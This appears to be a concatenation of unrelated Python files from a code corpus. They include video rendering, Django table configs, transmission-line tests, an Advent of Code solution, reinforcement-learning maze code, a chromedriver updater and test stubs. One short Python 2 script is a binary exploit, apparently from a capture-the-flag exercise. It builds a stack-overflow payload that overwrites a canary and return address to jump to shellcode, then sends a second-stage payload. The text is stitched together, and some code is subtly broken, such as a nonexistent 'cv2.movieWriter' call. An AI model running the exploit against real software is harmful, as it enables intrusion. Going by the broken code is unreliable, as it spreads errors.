The correct way should be selected depending of the way matplotlib is used.
dpi : int
The pixel density of the image. Should be a positive integer.
"""
buf = io.BytesIO()
if figure is None:
plt.savefig(buf, format="jpg", dpi=dpi)
else:
figure.savefig(buf, format="jpg", dpi=dpi)
buf.seek(0)
self.mem.writebytes("{:0>25}".format(self.cpt), buf.read())
self.cpt += 1
def render(self, outfile="movie.mp4", fps=20, close=True):
"""
Render the final movie and save it.
Parameters:
-----------
outfile : string
The path and name of the movie. The extension should be 'mp4'.
fps : int
Frames per second. Should be a positive integer.
close : bool
If True, close the RAM filesystem after rendering.
"""
images = self.mem.listdir(".")
height, width, _ = self.bytes2img(self.mem.getbytes(images[0])).shape
movie = cv2.movieWriter(outfile, cv2.movieWriter_fourcc(*'mp4v'), fps, (width, height))
for image in images:
print("{0} / {1}".format(int(image), len(images)))
movie.write(self.bytes2img(self.mem.getbytes(image)))
cv2.destroyAllWindows()
if close:
self.close()
def close(self):
"""
Close the RAM filesystem.
"""
self.mem.close()
@staticmethod
def bytes2img(bytes):
"""Convert a bytes image to openCV image.
Parameters:
-----------
bytes : bytes
Input containing the image bytes.
"""
return cv2.imdecode(np.frombuffer(bytes, dtype='uint8'), cv2.IMREAD_UNCHANGED)
| python |
table_config = [
{
'field': None,
'title': '选择',
'display': True,
'text':
{
'tpl': '<input type="checkbox" value="{n1}" />',
'kwargs':
{
'n1': '@id',
}
},
'attrs':
{
'nid': '@id',
}
},
{
'field': 'id',
'title': 'ID',
'display': False,
'text':
{
'tpl': '{n1}',
'kwargs':
{
'n1': '@id',
}
},
'attrs':
{
'k1': '@id',
'k2': 'v2',
}
},
{
'field': 'name',
'title': '机房',
'display': True,
'text':
{
'tpl': '{n1}',
'kwargs':
{
'n1': '@name',
}
},
'attrs': {
'name': 'name',
'origin': '@name',
'edit-enable': 'true',
},
},
{
'field': 'floor',
'title': '楼层',
'display': True,
'text':
{
'tpl': '{n1}',
'kwargs':
{
'n1': '@floor',
}
},
'attrs': {
'name': 'floor',
'origin': '@floor',
'edit-enable': 'true',
},
},
{
'field': None,
'title': '操作',
'display': True,
'text':
{
'tpl': "<a href='/del?nid={nid}'>删除</a>",
'kwargs':
{
'nid': '@id',
}
},
'attrs':
{
'k1': '@id',
'k2': 'v2',
}
},
]
| python |
#!/usr/bin/python2
import sys
import time
fh = open(sys.argv[1], 'rb')
stage_2 = fh.read()
fh.close()
sploit = [
'\x00', '\x00', # r7
'\x30', '\x30', # r6
'\x31', '\x31', # r5
'\x32', '\x32', # r3
'\x34', '\x33', # r2
'\x34', '\x34', # r1
'\x00', '\x0A', # canary
'\x35', '\x35', # rbp
'\x02', '\x2E', # ret
'\x20', '\x00', # ret to shellcode
'\x20', '\x00', # arg0 to input_read
'\x04', '\x00', # arg1 to input_read
]
sploit = ''.join(sploit)
sys.stdout.write(sploit)
sys.stdout.flush()
time.sleep(1)
sys.stdout.write(stage_2)
sys.stdout.flush()
| python |
#!/usr/bin/python3
import cmath
import numpy as np
import pytest
from pytest import approx
from emtoolbox.tline.tline import TLine
from emtoolbox.tline.mtl_network import MtlNetwork
def pol2rect(mag, deg):
return cmath.rect(mag, np.deg2rad(deg))
@pytest.mark.parametrize(
"f",
[
5e6,
np.array([5e6]),
np.array([5e6, 5e6]),
np.array([5e6, 5e6, 5e6]),
],
)
def test_network1_simple(f):
# Paul MTL P6.3
vp = 3e8
zc = 50
zs = 20 - 30j
zl = 200 + 500j
length = 78
tline = TLine.create_lowloss(zc, freq=f, vp=vp, length=length)
network = MtlNetwork(tline, zs, zl)
assert tline.n_wavelengths() == approx(1.3, rel=0.001)
assert network.reflection() == approx(pol2rect(0.9338, 9.866), rel=0.001)
assert network.reflection(0) == approx(pol2rect(0.9338, 153.9), rel=0.001)
assert network.input_impedance() == approx(pol2rect(11.73, 81.16), rel=0.001)
@pytest.mark.parametrize(
"f",
[
5e6,
np.array([5e6]),
np.array([5e6, 5e6]),
np.array([5e6, 5e6, 5e6]),
],
)
def test_network1_solve(f):
# Paul MTL P6.3
vp = 3e8
zc = 50
zs = 20 - 30j
zl = 200 + 500j
length = 78
vs = 50
tline = TLine.create_lowloss(zc, freq=f, vp=vp, length=length)
network = MtlNetwork(tline, zs, zl)
sol = network.solve(vs)
assert network.get_voltage(sol, 0) == approx(pol2rect(20.55, 121.3), rel=0.001)
assert network.get_voltage(sol, length) == approx(pol2rect(89.6, -50.45), rel=0.001)
assert network.vswr() == approx(29.21, rel=0.001)
@pytest.mark.parametrize(
"zl, result",
[
(50, 1.0),
(100, 2.0),
(10, 5.0),
(0, np.inf)
],
)
def test_vswr(zl, result):
zc = 50
zs = 50
tline = TLine.create_lowloss(zc)
network = MtlNetwork(tline, zs, zl)
assert network.vswr() == approx(result, rel=0.001)
| python |
# Section 10.8.1 snippets
# 10.8.1 Base Class CommissionEmployee
# Testing Class CommissionEmployee
from commissionemployee import CommissionEmployee
from decimal import Decimal
c = CommissionEmployee('Sue', 'Jones', '333-33-3333',
Decimal('10000.00'), Decimal('0.06'))
c
print(f'{c.earnings():,.2f}')
c.gross_sales = Decimal('20000.00')
c.commission_rate = Decimal('0.1')
print(f'{c.earnings():,.2f}')
# 10.8.2 Subclass SalariedCommissionEmployee
# Testing Class SalariedCommissionEmployee
from salariedcommissionemployee import SalariedCommissionEmployee
s = SalariedCommissionEmployee('Bob', 'Lewis', '444-44-4444',
Decimal('5000.00'), Decimal('0.04'), Decimal('300.00'))
print(s.first_name, s.last_name, s.ssn, s.gross_sales,
s.commission_rate, s.base_salary)
print(f'{s.earnings():,.2f}')
s.gross_sales = Decimal('10000.00')
s.commission_rate = Decimal('0.05')
s.base_salary = Decimal('1000.00')
print(s)
print(f'{s.earnings():,.2f}')
# Testing the "is a" Relationship
issubclass(SalariedCommissionEmployee, CommissionEmployee)
isinstance(s, CommissionEmployee)
isinstance(s, SalariedCommissionEmployee)
# Processing CommissionEmployees and SalariedCommissionEmployees Polymorphically
employees = [c, s]
for employee in employees:
print(employee)
print(f'{employee.earnings():,.2f}\n')
##########################################################################
# (C) Copyright 2019 by Deitel & Associates, Inc. and #
# Pearson Education, Inc. All Rights Reserved. #
# #
# DISCLAIMER: The authors and publisher of this book have used their #
# best efforts in preparing the book. These efforts include the #
# development, research, and testing of the theories and programs #
# to determine their effectiveness. The authors and publisher make #
# no warranty of any kind, expressed or implied, with regard to these #
# programs or to the documentation contained in these books. The authors #
# and publisher shall not be liable in any event for incidental or #
# consequential damages in connection with, or arising out of, the #
# furnishing, performance, or use of these programs. #
##########################################################################
| python |
"""
solution AdventOfCode 2019 day 20 part 2.
https://adventofcode.com/2019/day/20.
author: pca
"""
from general.general import read_file, get_location_input_files, measure
import matplotlib.pyplot as plt
from collections import Counter
import networkx as nx
import heapq
def to_grid(grid_txt):
grid = dict()
for y, line in enumerate(grid_txt):
for x, ch in enumerate(line):
grid[(y, x)] = ch
return grid
def node_distances(grid, node_positions, start_node):
deltas = [(-1, 0), (1, 0), (0, -1), (0, 1)]
visited = set()
q = list()
q.append((0, start_node))
while len(q) > 0:
d, (y, x) = q.pop(0)
if (y, x) in visited:
continue
visited.add((y, x))
# at a node with a code?
if (y, x) in node_positions:
yield d, (y, x)
# neighbours
for dy, dx in deltas:
if grid[(y + dy, x + dx)] == '.':
q.append((d + 1, (y + dy, x + dx)))
def all_distances(nodes, grid):
distances = dict()
node_codes = set()
for node_from in nodes.keys():
for (d, node_to) in node_distances(grid, nodes.keys(), node_from):
node_code_from = nodes[node_from]
node_code_to = nodes[node_to]
if node_code_to != node_code_from:
distances[(node_code_from, node_code_to)] = d
node_codes.add(node_code_from)
# setup the portals
for node_code, idx in node_codes:
if idx == 1:
distances[(node_code, -1), (node_code, 1)] = 1
distances[(node_code, 1), (node_code, -1)] = 1
return distances, node_codes
def read_nodes(grid):
deltas = [((-2, 0), (-1, 0)), ((1, 0), (2, 0)), ((0, -2), (0, -1)), ((0, 1), (0, 2))]
node_counter = Counter()
nodes_positions = dict()
# check for each grid location if it's a node.
# nodes neighbour a capital letter.
for y, x in grid:
if grid[(y, x)] == '.':
for ((dy1, dx1), (dy2, dx2)) in deltas:
ch1 = grid[(y + dy1, x + dx1)]
ch2 = grid[(y + dy2, x + dx2)]
if ch1.isupper() and ch2.isupper():
node_str = ch1 + ch2
# check if it's an outer gate
is_on_edge = (y == 2) or (x == 2) or (y, x + 3) not in grid or (y + 3, x) not in grid
if node_str in ('AA', 'ZZ'):
idx = 0
elif is_on_edge:
idx = 1
else:
idx = -1
nodes_positions[(y, x)] = (node_str, idx)
return nodes_positions
def solve(G):
frontier = list()
visited = set()
heapq.heappush(frontier, (0, -1, ('AA', 0), [(('AA', 0), 0)]))
while len(frontier) > 0:
dimension, total_distance, node, path = heapq.heappop(frontier)
if dimension < 0:
continue
if node in [('AA', 0), ('ZZ', 0)] and dimension != 0:
continue
if node == ('ZZ', 0) and dimension == 0:
print(f"found: {total_distance}")
return True, total_distance, path
if (dimension, node) in visited:
continue
visited.add((dimension, node))
# we always go to the other side of the node
node_code, node_delta = node
check_node = node_code, -node_delta
for neighbour in G.neighbors(check_node):
neighbour_code, neighbour_delta = neighbour
# make sure we don't go back right away on the same node.
if node_code != neighbour_code:
# count for movement to another dimension as well (+1).
distance = G.edges[(check_node, neighbour)]['weight'] + 1
delta_dimension = -node_delta
heapq.heappush(frontier, (dimension + delta_dimension, total_distance + distance, neighbour,
path + [(neighbour, dimension + delta_dimension)]))
return False, None, None
@measure
def main(args=None):
grid_txt = read_file(get_location_input_files(), 'input_day20.txt')
grid = to_grid(grid_txt)
nodes = read_nodes(grid)
distances, node_codes = all_distances(nodes, grid)
G = nx.Graph()
G.add_weighted_edges_from([(k[0], k[1], v) for k,v in distances.items()])
# draw graph
positions = {v: k for k, v in nodes.items()}
plt.figure(1, figsize=(12, 12))
nx.draw_networkx(G, node_size=50, pos=positions, with_labels=True, font_size=8, alpha=0.5)
plt.show()
res, total_distance, path = solve(G)
print(f"Total distance: {total_distance}")
if __name__ == "__main__":
main()
| python |
#!/usr/bin/env python
# encoding: utf-8
from maze import Maze
from RL_brain import SarsaLambdaTable, QLambdaTable
import numpy as np
METHOD = "QLambda"
def get_action(q_table, state):
state_action = q_table.ix[state, :]
state_action_max = state_action.max()
idxs = []
for max_item in range(len(state_action)):
if state_action[max_item] == state_action_max:
idxs.append(max_item)
sorted(idxs)
return tuple(idxs)
def get_policy(q_table, rows=6, cols=6, pixels=40, orign=20):
policy = []
for i in range(rows):
for j in range(cols):
item_center_x, item_center_y = (j * pixels + orign), (i * pixels + orign)
item_state = [item_center_x - 15.0, item_center_y - 15.0, item_center_x + 15.0, item_center_y + 15.0]
# If the current state is each terminated state, the value is -1
if item_state in [env.canvas.coords(env.hell1), env.canvas.coords(env.hell2),
env.canvas.coords(env.hell3), env.canvas.coords(env.hell4), env.canvas.coords(env.oval)]:
policy.append(-1)
continue
if str(item_state) not in q_table.index:
policy.append((0, 1, 2, 3))
continue
item_action_max = get_action(q_table, str(item_state))
policy.append(item_action_max)
return policy
def judge(observation):
'''
Determine whether the current state is in the secondary air duct
:param observation: current state
:return:
'''
x = (observation[0] + observation[2]) / 2
# When the x is 140, it is a duct
if x == 140:
return True
return False
def update():
for episode in range(1000):
observation = env.reset()
# Select behavior based on current state
action = RL.choose_action(str(observation))
# Initialize all eligibility_trace to 0
RL.eligibility_trace *= 0
while True:
env.render()
# In game,he position of the secondary wind will go up two squares,
# Determine whether the current state is in the secondary air duct and the generated action is an upward motion
if judge(observation) and action == 0:
observation_, reward, done, oval_flag = env.step(action)
# If the termination state occurs during the process, it ends directly
if done:
break
# Direct assignment is continued upwards, and reward add
action_ = 0
reward = 0.1
RL.learn(str(observation), action, reward, str(observation_), action_)
observation = observation_
action = action_
# Take action from the current state to get the observation_, reward, done, oval_flag
observation_, reward, done, oval_flag = env.step(action)
# Based on the next state selection behavior
action_ = RL.choose_action(str(observation_))
# If you go down the wind tunnel, you will do special treatment when you are not in the trap (to prevent the return of the wind tunnel to increase the reward)
if judge(observation) and action == 1:
reward = -0.1
RL.learn(str(observation), action, reward, str(observation_), action_)
observation = observation_
action = action_
if done:
break
print('Game Over')
q_table_result = RL.q_table
policy = get_policy(q_table_result)
print("The optimal strategy is", end=":")
print(policy)
print("Draw Policy", end=":")
policy_result = np.array(policy).reshape(5, 5)
print(policy_result)
print("Drawing path: ")
env.render_by_policy(policy_result)
if __name__ == "__main__":
env = Maze()
RL = SarsaLambdaTable(actions=list(range(env.n_actions)))
if METHOD == "QLambda":
RL = QLambdaTable(actions=list(range(env.n_actions)))
env.after(100, update)
env.mainloop()
| python |
from abc import ABC, abstractmethod
from datetime import datetime
from typing import List
from dateutil.tz import tz
from pytz import timezone
from dataclasses import dataclass
from importlib import import_module
from .constant import Interval, Exchange
from .object import BarData, TickData
from .setting import SETTINGS
DB_TZ = timezone(SETTINGS["database.timezone"])
# use this tz in datetime tzinfo, remove 6min problem
DATETIME_TZ = tz.gettz('Asia/Shanghai')
def convert_tz(dt: datetime) -> datetime:
"""
Convert timezone of datetime object to DB_TZ.
"""
dt = dt.astimezone(DB_TZ)
return dt.replace(tzinfo=None)
@dataclass
class BarOverview:
"""
Overview of bar data stored in database.
"""
symbol: str = ""
exchange: Exchange = None
interval: Interval = None
count: int = 0
start: datetime = None
end: datetime = None
class BaseDatabase(ABC):
"""
Abstract database class for connecting to different database.
"""
@abstractmethod
def save_bar_data(self, bars: List[BarData]) -> bool:
"""
Save bar data into database.
"""
pass
@abstractmethod
def save_tick_data(self, ticks: List[TickData]) -> bool:
"""
Save tick data into database.
"""
pass
@abstractmethod
def load_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval,
start: datetime,
end: datetime
) -> List[BarData]:
"""
Load bar data from database.
"""
pass
@abstractmethod
def load_tick_data(
self,
symbol: str,
exchange: Exchange,
start: datetime,
end: datetime
) -> List[TickData]:
"""
Load tick data from database.
"""
pass
@abstractmethod
def delete_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval
) -> int:
"""
Delete all bar data with given symbol + exchange + interval.
"""
pass
@abstractmethod
def delete_tick_data(
self,
symbol: str,
exchange: Exchange
) -> int:
"""
Delete all tick data with given symbol + exchange.
"""
pass
@abstractmethod
def get_bar_overview(self) -> List[BarOverview]:
"""
Return data avaible in database.
"""
pass
database: BaseDatabase = None
def get_database() -> BaseDatabase:
""""""
# Return database object if already inited
global database
if database:
return database
# Read database related global setting
database_name: str = SETTINGS["database.name"]
module_name: str = f"vnpy_{database_name}"
# Try to import database module
try:
module = import_module(module_name)
except ModuleNotFoundError:
print(f"找不到数据库驱动{module_name},使用默认的SQLite数据库")
module = import_module("vnpy_sqlite")
# Create database object from module
database = module.Database()
return database
| python |
import os
import requests
import subprocess
import wget
import zipfile
def download_latest_version(version_number, driver_directory):
"""Download latest version of chromedriver to a specified directory.
:param driver_directory: Directory to save and download chromedriver.exe into.
:type driver_directory: str
:param version_number: Latest chromedriver release from chromedriver.storage.googleapis.com.
:type version_number: str
:return: None
"""
print("Attempting to download latest driver online......")
download_url = "https://chromedriver.storage.googleapis.com/" + version_number + "/chromedriver_win32.zip"
print(download_url)
# Download driver as a zip file to specified folder
latest_driver_zip = wget.download(download_url, out=driver_directory)
# Read zip file
with zipfile.ZipFile(latest_driver_zip, 'r') as downloaded_zip:
# Extract contents from downloaded zip file to specified folder path
downloaded_zip.extractall(path=driver_directory)
print(f"\nSuccessfully downloaded version {version_number} to:\n{driver_directory}")
# Delete the zip file downloaded
os.remove(latest_driver_zip)
return
def check_driver(driver_directory):
"""Check local chromedriver version and compare it with latest available version online.
:param driver_directory: Directory to store chromedriver.exe. Required to add driver_directory to path before using.
:type driver_directory: str
:return: True if chromedriver.exe is already in driver_directory, else chromedriver is automatically downloaded.
"""
# Check for latest chromedriver version online
latest_release_url = "https://chromedriver.storage.googleapis.com/LATEST_RELEASE"
response = requests.get(latest_release_url)
online_driver_version = response.text
try:
# Executes cmd line entry to check for existing web-driver version locally
cmd_run = subprocess.run("chromedriver --version",
capture_output=True,
text=True)
except FileNotFoundError:
# Handling case if chromedriver not found in path
print("No chromedriver.exe found in specified path\n")
download_latest_version(online_driver_version, driver_directory)
else:
# Extract local driver version number as string from terminal output
local_driver_version = cmd_run.stdout.split()[1]
print(f"Local chromedriver version: {local_driver_version}")
print(f"Latest online chromedriver version: {online_driver_version}")
if local_driver_version == online_driver_version:
return True
else:
download_latest_version(online_driver_version, driver_directory)
| python |
"""
Given an array, return the max difference between
2 numbers in array whereby:
- larger number is after smaller number in array order
eg: [0, 1, 12] -> 12
eg: [12, 0, 1] -> 1
"""
def maxDiff(arr, n):
# Initialize Result
maxDiff = -1
# Initialize max element from
# right side
maxRight = arr[n - 1]
for i in range(n - 2, -1, -1):
if arr[i] > maxRight:
maxRight = arr[i]
else:
diff = maxRight - arr[i]
if diff > maxDiff:
maxDiff = diff
return maxDiff
| python |
from datetime import datetime
import dill as pickle
from pathlib import Path
from copy import deepcopy
import numpy as np
from skimage.io import imread
import GPnd
from GPnd import *
from plotting import MAP_Estimator
if __name__=='__main__':
f_path = Path('chains/2019-09-22T16-01-08_n100000.pkl')
with open(f_path, 'rb') as f:
chain = pickle.load(f)
image_path = Path('data/head.png')
image = dataLoading.import_image(image_path, size=chain.size)
data = chain.T(image)
fbp = chain.T.inv(data)
print(f_path)
print(
'Data Shape: %s\n'%(data.shape,),
'L_2 Errors: \n',
' Filtered Back projections: %s\n'%(np.linalg.norm(fbp-image)/np.product(image.shape),),
' MCMC Reconstruction: %s\n'%(np.linalg.norm(chain.reconstruction-image)/np.product(image.shape)),
) | python |
# encoding=utf8
# pylint: disable=line-too-long
"""Implementation of modified nature-inspired algorithms."""
from NiaPy.algorithms.modified.hba import HybridBatAlgorithm
from NiaPy.algorithms.modified.hde import DifferentialEvolutionMTS, DifferentialEvolutionMTSv1, DynNpDifferentialEvolutionMTS, DynNpDifferentialEvolutionMTSv1, MultiStratgyDifferentialEvolutionMTS, DynNpMultiStrategyDifferentialEvolutionMTS, DynNpMultiStrategyDifferentialEvolutionMTSv1, MultiStratgyDifferentialEvolutionMTSv1
from NiaPy.algorithms.modified.jde import SelfAdaptiveDifferentialEvolution, DynNpSelfAdaptiveDifferentialEvolutionAlgorithm, MultiStrategySelfAdaptiveDifferentialEvolution, DynNpMultiStrategySelfAdaptiveDifferentialEvolution
__all__ = [
'HybridBatAlgorithm',
'DifferentialEvolutionMTS',
'DifferentialEvolutionMTSv1',
'DynNpDifferentialEvolutionMTS',
'DynNpDifferentialEvolutionMTSv1',
'MultiStratgyDifferentialEvolutionMTS',
'MultiStratgyDifferentialEvolutionMTSv1',
'DynNpMultiStrategyDifferentialEvolutionMTS',
'DynNpMultiStrategyDifferentialEvolutionMTSv1',
'SelfAdaptiveDifferentialEvolution',
'DynNpSelfAdaptiveDifferentialEvolutionAlgorithm',
'MultiStrategySelfAdaptiveDifferentialEvolution',
'DynNpMultiStrategySelfAdaptiveDifferentialEvolution'
]
| python |
from __future__ import annotations
from typing import Any, TypeVar, cast
from discord.ext import typed_commands
C = TypeVar('C', bound='Cog[Any]')
CT = TypeVar('CT', bound=typed_commands.Context)
class Cog(typed_commands.Cog[CT]):
def _inject(self: C, bot: typed_commands.Bot[CT], /) -> C:
self.__pre_inject__(bot)
cog: C = cast(Any, super())._inject(bot)
self.__post_inject__(bot)
return cog
def _eject(self, bot: typed_commands.Bot[CT], /) -> None:
self.__pre_eject__(bot)
cast(Any, super())._eject(bot)
self.__post_eject__(bot)
def __pre_inject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
def __post_inject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
def __pre_eject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
def __post_eject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
| python |
import xlrd
import csv
def Excel2CSV(ExcelFile='SicCodesAllLevels.xls',
SheetName='SIC4', CSVFile='ref_list.csv'):
workbook = xlrd.open_workbook(ExcelFile)
worksheet = workbook.sheet_by_name(SheetName)
csvfile = open(CSVFile, 'wb')
wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
for rownum in xrange(worksheet.nrows):
wr.writerow(
list(x.encode('utf-8')
for x in worksheet.row_values(rownum)))
csvfile.close()
Excel2CSV()
| python |
import numpy as np
import os
class Lay(object):
def __init__(self):
self.__m = self.m_world = None
self.__r = self.m_world = None
self.__s = self.m_world = None
self.m_world = None
self.m_world_inv = None
self.is_ready = False
def set(self, move=np.eye(4), rotate=np.eye(4), scale=np.eye(4)):
if type(move) != np.ndarray or move.shape != (4, 4):
raise Exception('Parameter `move` must be 4x4 numpy.ndarray')
if type(rotate) != np.ndarray or rotate.shape != (4, 4):
raise Exception('Parameter `rotate` must be 4x4 numpy.ndarray.')
if type(scale) != np.ndarray or scale.shape != (4, 4):
raise Exception('Parameter `scale` must or 4x4 numpy.ndarray')
self.__m = move
self.__r = rotate
self.__s = scale
self.__calculate()
def set_by_file(self, file_path):
# read file
with open(os.path.split(os.path.realpath(__file__))[0] + os.sep + file_path) as file:
line_list = file.readlines()
for line in line_list:
line_split = line.split()
if len(line_split) <= 0:
continue
elif line_split[0] == 'move':
self.__m = np.array([
[float(line_split[1]), float(line_split[2]), float(line_split[3]), float(line_split[4])],
[float(line_split[5]), float(line_split[6]), float(line_split[7]), float(line_split[8])],
[float(line_split[9]), float(line_split[10]), float(line_split[11]), float(line_split[12])],
[float(line_split[13]), float(line_split[14]), float(line_split[15]), float(line_split[16])],
])
elif line_split[0] == 'rotate':
self.__r = np.array([
[float(line_split[1]), float(line_split[2]), float(line_split[3]), float(line_split[4])],
[float(line_split[5]), float(line_split[6]), float(line_split[7]), float(line_split[8])],
[float(line_split[9]), float(line_split[10]), float(line_split[11]), float(line_split[12])],
[float(line_split[13]), float(line_split[14]), float(line_split[15]), float(line_split[16])],
])
elif line_split[0] == 'scale':
self.__s = np.array([
[float(line_split[1]), float(line_split[2]), float(line_split[3]), float(line_split[4])],
[float(line_split[5]), float(line_split[6]), float(line_split[7]), float(line_split[8])],
[float(line_split[9]), float(line_split[10]), float(line_split[11]), float(line_split[12])],
[float(line_split[13]), float(line_split[14]), float(line_split[15]), float(line_split[16])],
])
self.__calculate()
def __calculate(self):
self.m_world = np.dot(np.dot(self.__m, self.__r), self.__s)
self.m_world_inv = np.linalg.inv(self.m_world)
self.is_ready = True
| python |
"""Class instance for Transformer
"""
import argparse
# pylint: disable=unused-argument
class Transformer():
"""Generic class for supporting transformers
"""
def __init__(self, **kwargs):
"""Performs initialization of class instance
Arguments:
kwargs: additional parameters passed into Transformer instance
"""
self.args = None
def add_parameters(self, parser: argparse.ArgumentParser) -> None:
"""Adds processing parameters to existing parameters
Arguments:
parser: instance of argparse
"""
# pylint: disable=no-self-use
def get_transformer_params(self, args: argparse.Namespace, metadata: list) -> dict:
"""Returns a parameter list for processing data
Arguments:
args: result of calling argparse.parse_args
metadata: the list of loaded metadata
Return:
A dictionary of parameter names and value to pass to transformer
"""
self.args = args
params = {}
return params
# pylint: disable=no-self-use
def retrieve_files(self, transformer_params: dict, metadata: list) -> tuple:
"""Retrieves files as needed to make them available for processing
Arguments:
transformer_params: the values returned from get_transformer_params() call
metadata: the loaded metadata
Return:
A tuple consisting of the return code and an optional error message.
Notes:
A negative return code is considered an error and an associated message, if specified,
will be treated as such.
"""
return 0, "everything's in order"
| python |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
from PySide2 import QtCore, QtGui, QtWidgets
class GraphicView(QtWidgets.QGraphicsView):
def __init__(self):
QtWidgets.QGraphicsView.__init__(self)
self.setWindowTitle("QGraphicsView")
scene = QtWidgets.QGraphicsScene(self)
scene.setSceneRect(0, 0, 160, 120)
self.setScene(scene)
line = QtCore.QLineF(10,10,100,100)
node = QtWidgets.QGraphicsLineItem(line)
scene.addItem(node)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
widget = GraphicView()
widget.show()
sys.exit(app.exec_())
| python |
# Generated by Django 3.2.7 on 2021-09-27 15:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rgd_fmv', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='fmv',
name='status',
field=models.CharField(
choices=[
('created', 'Created but not queued'),
('queued', 'Queued for processing'),
('running', 'Processing'),
('failed', 'Failed'),
('success', 'Succeeded'),
('skipped', 'Skipped'),
],
default='created',
max_length=20,
),
),
]
| python |
from bs4 import BeautifulSoup
import requests
import re
from graph import Graph
from player import Player
class Crawler:
def __init__(self,link_root=""):
self.link_root = "https://www.hltv.org/stats/teams"
self.headers = {}
self.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KH TML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
self.headers["Refer"] = "https://www.hltv.org/stats/teams"
self.grafo = Graph()
def get_page(self, link):
return requests.get(link,headers=self.headers)
def walk_teams(self):
page = self.get_page(self.link_root)
soup = BeautifulSoup(page.text, 'html.parser')
for team in soup.find_all("td", {"class":"teamCol-teams-overview"}):
link_team = self.link_root + "/lineups/" + team.a['href'][13:]
self.get_lineups(link_team)
def get_lineups(self,link_team):
page = self.get_page(link_team)
soup = BeautifulSoup(page.text,'html.parser')
for line in soup.find_all("div",{"class":"lineup-container"}):
self.extract_players(line)
def connect_lineup(self,list_players):
for i in range(len(list_players)):
list_players[i] = self.grafo.add_player(list_players[i])
for i in range(len(list_players) - 1) :
for j in range( i + 1, len(list_players)):
self.grafo.connect(list_players[i].identificador,list_players[j].identificador)
def extract_players(self, line):
line_player = []
for raw_player in line.find_all("div", {"class":"col teammate"}):
p = Player()
p.conexoes = []
p.foto = raw_player.img['src']
p.nome = re.match(r'/stats/players/\d+/(.+)',raw_player.div.a['href']).group(1)
p.nacionalidade = raw_player.div.img['alt']
line_player.append(p)
self.connect_lineup(line_player)
| python |
from flask_wtf import FlaskForm
class NameForm(FlaskForm):
pass
| python |
# coding: utf-8
"""
MailSlurp API
MailSlurp is an API for sending and receiving emails from dynamically allocated email addresses. It's designed for developers and QA teams to test applications, process inbound emails, send templated notifications, attachments, and more. ## Resources - [Homepage](https://www.mailslurp.com) - Get an [API KEY](https://app.mailslurp.com/sign-up/) - Generated [SDK Clients](https://www.mailslurp.com/docs/) - [Examples](https://github.com/mailslurp/examples) repository # noqa: E501
The version of the OpenAPI document: 6.5.2
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import mailslurp_client
from mailslurp_client.api.expired_controller_api import ExpiredControllerApi # noqa: E501
from mailslurp_client.rest import ApiException
class TestExpiredControllerApi(unittest.TestCase):
"""ExpiredControllerApi unit test stubs"""
def setUp(self):
self.api = mailslurp_client.api.expired_controller_api.ExpiredControllerApi() # noqa: E501
def tearDown(self):
pass
def test_get_expiration_defaults(self):
"""Test case for get_expiration_defaults
Get default expiration settings # noqa: E501
"""
pass
def test_get_expired_inbox_by_inbox_id(self):
"""Test case for get_expired_inbox_by_inbox_id
Get expired inbox record for a previously existing inbox # noqa: E501
"""
pass
def test_get_expired_inbox_record(self):
"""Test case for get_expired_inbox_record
Get an expired inbox record # noqa: E501
"""
pass
def test_get_expired_inboxes(self):
"""Test case for get_expired_inboxes
List records of expired inboxes # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| python |
""""""
import pytest
import random
import tempfile
from textwrap import dedent
from unittest import mock
from pybryt.utils import *
from .test_reference import generate_reference_notebook
def test_filter_picklable_list():
"""
"""
l = [1, 2, 3]
filter_picklable_list(l)
assert len(l) == 3
with mock.patch("dill.dumps") as mocked_dill:
mocked_dill.side_effect = Exception()
filter_picklable_list(l)
assert len(l) == 0
def test_notebook_to_string():
"""
"""
ref = generate_reference_notebook()
s = notebook_to_string(ref)
assert s.strip() == dedent("""\
import pybryt
def median(S):
sorted_S = sorted(S)
pybryt.Value(sorted_S, name="sorted", group="median", limit=5, success_message="SUCCESS: Sorted the sample correctly",
failure_message="ERROR: The sample was not sorted")
size_of_set = len(S)
pybryt.Value(size_of_set, name="size", group="median", success_message = "SUCCESS: Computed the size of the sample",
failure_message="ERROR: Did not capture the size of the set to determine if it is odd or even")
middle = size_of_set // 2
is_set_size_even = (size_of_set % 2) == 0
if is_set_size_even:
return (sorted_S[middle-1] + sorted_S[middle]) / 2
else:
return sorted_S[middle]
import numpy as np
np.random.seed(42)
for _ in range(10):
vals = [np.random.randint(-1000, 1000) for _ in range(np.random.randint(1, 1000))]
val = median(vals)
pybryt.Value(val, name="median", group="median", success_message="SUCCESS: computed the correct median",
failure_message="ERROR: failed to compute the median")
""").strip()
with pytest.raises(TypeError, match="invalid notebook type"):
notebook_to_string(1)
def test_make_secret():
"""
"""
random.seed(42)
s = make_secret()
print(s)
assert s == "HBRPOI"
def test_save_notebook():
"""
"""
with mock.patch("pybryt.utils.get_ipython") as mocked_get:
with mock.patch("pybryt.utils.publish_display_data") as mocked_pub:
mocked_get.return_value = True
with tempfile.NamedTemporaryFile(suffix=".ipynb") as ntf:
v = save_notebook(ntf.name, timeout=1)
mocked_pub.assert_called()
assert not v
| python |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@文件 :audit_utils.py
@说明 :
@时间 :2020/07/21 16:38:22
@作者 :Riven
@版本 :1.0.0
'''
import base64, logging, socket, sys
sys.path.append('.')
from app_server.src.utils.collection_utils import get_first_existing
from app_server.src.utils.tornado_utils import get_proxied_ip
HOSTNAME = 'hostname'
IP = 'ip'
PROXIED_USERNAME = 'proxied_username'
PROXIED_IP = 'proxied_ip'
PROXIED_HOSTNAME = 'proxied_hostname'
AUTH_USERNAME = 'auth_username'
LOGGER = logging.getLogger('script_server.audit_utils')
def get_all_audit_names(request_handler):
result = {}
